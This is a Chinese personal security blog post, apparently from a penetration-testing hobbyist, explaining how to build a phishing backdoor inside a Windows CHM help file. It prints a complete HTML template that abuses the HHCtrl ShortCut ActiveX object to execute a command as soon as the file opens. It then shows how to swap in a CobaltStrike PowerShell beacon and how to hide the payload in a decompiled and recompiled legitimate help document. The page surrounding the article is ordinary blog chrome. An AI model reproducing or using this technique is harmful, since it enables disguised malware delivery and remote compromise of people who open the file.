<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Tu3k" />
<link rel="stylesheet" href="/css/tags.css" media="all">


<meta name="description" content="Chm简介类似于一款用于存储信息和图文的帮助文档，里面可以集成很多页面，由html渲染而成，通过调用Windows中的hh.exe来执行。">
<meta property="og:type" content="article">
<meta property="og:title" content="CobaltStrike实现Chm后门">
<meta property="og:url" content="https://www.tu3k.cn/2021/01/08/cs-chm-online/index.html">
<meta property="og:site_name">
<meta property="og:description" content="Chm简介类似于一款用于存储信息和图文的帮助文档，里面可以集成很多页面，由html渲染而成，通过调用Windows中的hh.exe来执行。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/1.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/2.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/3.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/4.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/5.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/6.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/7.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/8.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/9.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/10.png">
<meta property="og:image" content="http://www.tu3k.cn/images/Chm/11.png">
<meta property="article:published_time" content="2021-01-07T18:28:43.000Z">
<meta property="article:modified_time" content="2021-01-07T16:43:28.475Z">
<meta property="article:tag" content="CobaltStrike">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://www.tu3k.cn/images/Chm/1.png">


    <link rel="icon" href="/images/favicon.ico">
  




    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>CobaltStrike实现Chm后门 | Tu3k's Blog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>





    <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?691d4c8cb59ad2a5d8c46f1ce6268b57";
            var s = document.getElementsByTagName("script")[0]; 
            s.parentNode.insertBefore(hm, s);
        })();
    </script>


<meta name="generator" content="Hexo 5.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/images/qq.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="false" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">首页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                            <li><a href="/playlist/">那忆年</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 微信" href="#####?rnm####?rnm####?xswl####1119866279" title="微信"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CGI%E7%BC%96%E7%A8%8B/" rel="tag">CGI编程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CobaltStrike/" rel="tag">CobaltStrike</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Frp%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91/" rel="tag">Frp内网转发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Ocr/" rel="tag">Ocr</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pymysql/" rel="tag">Pymysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python%E5%87%BD%E6%95%B0/" rel="tag">Python函数</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python%E6%AD%A3%E5%88%99/" rel="tag">Python正则</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python%E7%AC%94%E8%AE%B0/" rel="tag">Python笔记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Redis/" rel="tag">Redis</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Ueditor%E6%BC%8F%E6%B4%9E/" rel="tag">Ueditor漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/" rel="tag">XXE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/dll%E5%8A%AB%E6%8C%81/" rel="tag">dll劫持</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/flash%E9%92%93%E9%B1%BC/" rel="tag">flash钓鱼</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kerberos/" rel="tag">kerberos</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python-mysql/" rel="tag">python_mysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/socket/" rel="tag">socket</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sprintf/" rel="tag">sprintf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%BC%AB%E6%B8%B8/" rel="tag">内网漫游</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%87%BA%E7%89%88%E7%A4%BE%E6%BC%8F%E6%B4%9E/" rel="tag">出版社漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%A4%9A%E7%BA%BF%E7%A8%8B/" rel="tag">多线程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%99%E8%82%B2%E7%B3%BB%E7%BB%9F-%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag">教育系统 漏洞挖掘</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%98%9F%E5%A4%967i24%E6%8F%90%E6%9D%83/" rel="tag">星外7i24提权</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BB%A7%E6%89%BF/" rel="tag">继承</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BB%B4%E6%8C%81%E6%9D%83%E9%99%90/" rel="tag">维持权限</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%AA%91%E5%A3%ABCMS-Getshell/" rel="tag">骑士CMS Getshell</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.tu3k.cn">吃可爱存活的博客</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">博客就是记录平常学习的笔记和操作，以及最新漏洞的复现，写成文章增加记忆力和动手能力[小博主真的菜]。生活很苦，但你要努力，加油，追梦人。</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/images/qq.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">首页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                    <li><a href="/playlist/">那忆年</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 微信" target="_blank" href="#####?rnm####?rnm####?xswl####1119866279" title="微信"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-cs-chm-online" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/01/08/cs-chm-online/" class="article-date">
      <time datetime="2021-01-07T18:28:43.000Z" itemprop="datePublished">2021-01-08</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CobaltStrike实现Chm后门
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CobaltStrike/" rel="tag">CobaltStrike</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
<div class="article-entry" itemprop="articleBody">
    
        
        <h2 id="Chm简介"><a href="#Chm简介" class="headerlink" title="Chm简介"></a>Chm简介</h2><p>类似于一款用于存储信息和图文的帮助文档，里面可以集成很多页面，由html渲染而成，通过调用Windows中的hh.exe来执行。</p>
<a id="more"></a>
<h2 id="实现"><a href="#实现" class="headerlink" title="实现"></a>实现</h2><h3 id="Chm钓鱼后门文件制作——打开Chm就弹计算器"><a href="#Chm钓鱼后门文件制作——打开Chm就弹计算器" class="headerlink" title="Chm钓鱼后门文件制作——打开Chm就弹计算器"></a>Chm钓鱼后门文件制作——打开Chm就弹计算器</h3><h4 id="需要用到的工具："><a href="#需要用到的工具：" class="headerlink" title="需要用到的工具："></a>需要用到的工具：</h4><p>① EasyCHM<br>② CobaltStrike</p>
<p>先安装好EasyChm，在桌面建立一个新文件夹名为testchm用来存放木马payload，单独一个文件夹为了方便后面在EasyChm中去打开这个项目，payload框架为html</p>
<p>html源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;title&gt;Chm Calc Test&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;command exec &lt;OBJECT id&#x3D;x classid&#x3D;&quot;clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11&quot; width&#x3D;1 height&#x3D;1&gt;</span><br><span class="line">&lt;PARAM name&#x3D;&quot;Command&quot; value&#x3D;&quot;ShortCut&quot;&gt;</span><br><span class="line">&lt;PARAM name&#x3D;&quot;Button&quot; value&#x3D;&quot;Bitmap::shortcut&quot;&gt;</span><br><span class="line">&lt;PARAM name&#x3D;&quot;Item1&quot; value&#x3D;&#39;,payload&#39;&gt;</span><br><span class="line">&lt;PARAM name&#x3D;&quot;Item2&quot; value&#x3D;&quot;273,1,1&quot;&gt;</span><br><span class="line">&lt;&#x2F;OBJECT&gt;</span><br><span class="line">&lt;SCRIPT&gt;x.Click();&lt;&#x2F;SCRIPT&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>
<p>这里的payload即为我们cs或msf生成的payload，这里以calc.exe来测试<br><img src="http://www.tu3k.cn/images/Chm/1.png" alt="calc" title="calc"></p>
<h4 id="进行编译："><a href="#进行编译：" class="headerlink" title="进行编译："></a>进行编译：</h4><p>打开EasyChm，新建项目，文件夹为刚才创建的testchm文件夹<br><img src="http://www.tu3k.cn/images/Chm/2.png" alt="testchm" title="testchm"><br>背景是打开后的页面，确认无误后点击编译，(和C语言差不多，编译——&gt;生成可执行文件),就会在上级目录生成一个testchm.chm<br><img src="http://www.tu3k.cn/images/Chm/3.png" alt="testchm" title="testchm"><br>双击运行 成功弹计算器<br><img src="http://www.tu3k.cn/images/Chm/4.png" alt="testchm" title="testchm"></p>
<h3 id="CobaltStrike配合上线Chm"><a href="#CobaltStrike配合上线Chm" class="headerlink" title="CobaltStrike配合上线Chm"></a>CobaltStrike配合上线Chm</h3><p>CS生成ps payload<br><img src="http://www.tu3k.cn/images/Chm/5.png" alt="cs_chm" title="cs_chm"><br><img src="http://www.tu3k.cn/images/Chm/6.png" alt="ps_cs_chm" title="ps_cs_chm"><br>将payload把calc.exe替换即可，这里要注意，exe后要加个逗号<code>&#39;,&#39;</code>，而且ps代码里的双引号和html里的单引号会起冲突，将ps双引号删掉，html单换双即可<br><img src="http://www.tu3k.cn/images/Chm/7.png" alt="ps_cs_chm" title="ps_cs_chm"><br>没啥问题，编译，运行<br><img src="http://www.tu3k.cn/images/Chm/8.png" alt="ps_cs_chm" title="ps_cs_chm"><br>上线即可</p>
<h3 id="正常Chm文档伪装上线"><a href="#正常Chm文档伪装上线" class="headerlink" title="正常Chm文档伪装上线"></a>正常Chm文档伪装上线</h3><h4 id="流程：将一个正常的Chm帮助文档反编译成html源码，然后在html源码中插入我们的payload，重新编译，运行"><a href="#流程：将一个正常的Chm帮助文档反编译成html源码，然后在html源码中插入我们的payload，重新编译，运行" class="headerlink" title="流程：将一个正常的Chm帮助文档反编译成html源码，然后在html源码中插入我们的payload，重新编译，运行."></a>流程：将一个正常的Chm帮助文档反编译成html源码，然后在html源码中插入我们的payload，重新编译，运行.</h4><p>测试文档：之前看的一个关于星外提权的文档（星外提权.chm）<br>先使用 <code>hh.exe -decompile .\\html 星外提权.chm</code><br>将chm反编译，源码在同目录的html文件夹下，然后选择一个html文件编译 插入我们的HTML payload框架，注意要记住这个插入的html的文件名<br><img src="http://www.tu3k.cn/images/Chm/9.png" alt="ps_cs_chm" title="ps_cs_chm"><br>首页和显示页要设置存在payload的文件名，这样一打开就能运行我们的payload上线<br>编译<br><img src="http://www.tu3k.cn/images/Chm/10.png" alt="ps_cs_chm" title="ps_cs_chm"><br>运行成功上线<br><img src="http://www.tu3k.cn/images/Chm/11.png" alt="ps_cs_chm" title="ps_cs_chm"></p>

    
</div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2021/01/08/cs-chm-online/">CobaltStrike实现Chm后门</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2021-01-08, 02:28:43</p>
        <p><span>Updated:</span>2021-01-08, 00:43:28</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2021/01/08/cs-chm-online/" title="CobaltStrike实现Chm后门">https://www.tu3k.cn/2021/01/08/cs-chm-online/</a>
            <span class="copy-path" data-clipboard-text="From https://www.tu3k.cn/2021/01/08/cs-chm-online/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2021/01/09/74cms-tempelate-log-include-shell/">
                    骑士CMS 模板文件日志包含Getshell
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2021/01/07/redis/">
                    Redis未授权访问
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Chm%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">Chm简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0"><span class="toc-number">2.</span> <span class="toc-text">实现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Chm%E9%92%93%E9%B1%BC%E5%90%8E%E9%97%A8%E6%96%87%E4%BB%B6%E5%88%B6%E4%BD%9C%E2%80%94%E2%80%94%E6%89%93%E5%BC%80Chm%E5%B0%B1%E5%BC%B9%E8%AE%A1%E7%AE%97%E5%99%A8"><span class="toc-number">2.1.</span> <span class="toc-text">Chm钓鱼后门文件制作——打开Chm就弹计算器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%9C%80%E8%A6%81%E7%94%A8%E5%88%B0%E7%9A%84%E5%B7%A5%E5%85%B7%EF%BC%9A"><span class="toc-number">2.1.1.</span> <span class="toc-text">需要用到的工具：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%9B%E8%A1%8C%E7%BC%96%E8%AF%91%EF%BC%9A"><span class="toc-number">2.1.2.</span> <span class="toc-text">进行编译：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CobaltStrike%E9%85%8D%E5%90%88%E4%B8%8A%E7%BA%BFChm"><span class="toc-number">2.2.</span> <span class="toc-text">CobaltStrike配合上线Chm</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A3%E5%B8%B8Chm%E6%96%87%E6%A1%A3%E4%BC%AA%E8%A3%85%E4%B8%8A%E7%BA%BF"><span class="toc-number">2.3.</span> <span class="toc-text">正常Chm文档伪装上线</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B5%81%E7%A8%8B%EF%BC%9A%E5%B0%86%E4%B8%80%E4%B8%AA%E6%AD%A3%E5%B8%B8%E7%9A%84Chm%E5%B8%AE%E5%8A%A9%E6%96%87%E6%A1%A3%E5%8F%8D%E7%BC%96%E8%AF%91%E6%88%90html%E6%BA%90%E7%A0%81%EF%BC%8C%E7%84%B6%E5%90%8E%E5%9C%A8html%E6%BA%90%E7%A0%81%E4%B8%AD%E6%8F%92%E5%85%A5%E6%88%91%E4%BB%AC%E7%9A%84payload%EF%BC%8C%E9%87%8D%E6%96%B0%E7%BC%96%E8%AF%91%EF%BC%8C%E8%BF%90%E8%A1%8C"><span class="toc-number">2.3.1.</span> <span class="toc-text">流程：将一个正常的Chm帮助文档反编译成html源码，然后在html源码中插入我们的payload，重新编译，运行.</span></a></li></ol></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"CobaltStrike实现Chm后门　| 　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2021/01/09/74cms-tempelate-log-include-shell/" title="Pre: 骑士CMS 模板文件日志包含Getshell">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2021/01/07/redis/" title="Next: Redis未授权访问">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/04/15/ctf-123/">i春秋CTF_123</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/13/vid-ctf/">百度杯CTF_Vulcan Logic Dumper</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/12/ctf-getflag/">百度杯CTF比赛_十月场GetFlag</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/09/sprintf-bug/">Sprintf格式化造成的注入漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/28/ichunqiu-ctf-web/">i春秋_WEB_CTF_刷题笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/27/filemanage-ctf/">文件上传二次注入_CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/27/duizhan-sql/">堆栈注入_CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/26/php-nizhuansiwei-ctf/">PHP逆转思维_CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/26/flask-session-decode-ctf/">Flask_Session缺陷_CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/php-serialize-ctf/">PHP反序列化_CTF2</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/preg-replace-rce/">某CTF题记录</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/php-seri-ctf/">PHP反序列化_CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/14/xxe-bug/">XXE漏洞详解</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/08/php-fanxuliehua/">PHP反序列化漏洞详解</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/07/Python-duoxiancheng/">Python多线程和锁学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/04/python-socket/">Python之Socket简单学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/04/pymysql/">Pymysql驱动库详解</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/03/python-mysql/">Python管理Mysql数据库</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/02/python-cgi-code2/">Python_CGI编程笔记2</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/01/python-cgi-code/">Python_CGI编程笔记1</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/28/python-fanxulie/">Python反序列化理解</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/27/python-zhengze/">Python正则表达式学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/22/python-jicheng/">Python面向对象继承</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/24/dllhack/">Dll劫持的简单实现</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/23/Python-tesseract-getCode/">Python Ocr识别验证码</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/17/Python-def/">Python字符串内建函数</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/14/Python-one/">Python笔记1——基本语法</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/13/flash-diaoyu/">Flash制作钓鱼远控上线CS</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/11/chubanshe-bugs/">某出版社漏洞大礼包</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/10/sc-powershell-serivces-yincang/">SC实现隐藏Windows服务维持权限</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/09/74cms-tempelate-log-include-shell/">骑士CMS 模板文件日志包含Getshell</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/08/cs-chm-online/">CobaltStrike实现Chm后门</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/07/redis/">Redis未授权访问</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/04/7i24tiquan/">记录一次7i24星外虚拟主机提权</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/03/yinduneiwang/">记一次印度网站getshell到内网漫游</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/29/kerberos-study/">个人理解kerberos的作用和运行流程</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/28/frp/">Frp内网转发/穿透使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/28/edu_bug/">某教育系统的基础漏洞检测</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/27/ueditor_net_upload/">Ueditor.NET版本任意文件上传漏洞</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2020-2021 @Baicai
            </div>
            <div class="footer-right">
                <a href="https://www.tu3k.cn" target="_blank" title="A fast, simple &amp; powerful blog framework">By Tu3k</a>       ||	This WebSite No Smoking</a> <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
<div id="musicMouseDrag" style="position:fixed; z-index: 9999; bottom: 0; right: 0;">
    
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 1;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
             title: "a.article-title, .article-more-link a", 
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
